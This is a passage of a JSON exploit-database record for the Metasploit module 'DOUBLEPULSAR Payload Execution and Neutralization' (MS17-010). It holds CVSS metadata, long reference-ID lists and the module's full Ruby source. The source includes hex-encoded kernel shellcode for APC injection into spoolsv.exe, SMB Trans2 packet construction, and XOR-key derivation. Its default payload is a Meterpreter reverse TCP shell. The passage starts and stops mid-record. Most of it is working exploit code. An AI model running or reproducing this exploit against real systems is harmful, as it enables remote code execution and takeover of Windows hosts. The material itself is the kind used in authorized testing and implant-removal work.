\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-10] #"}, "lastseen": "2021-09-09T22:15:20", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d59b203441edd7344c236c40170ccb5a", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T22:13:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-10T22:13:51", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-10T22:13:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-11] #"}, "lastseen": "2021-09-10T22:13:51", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3b85260f79f398a9ca773de2bd7f79c3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-11T22:19:07", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", 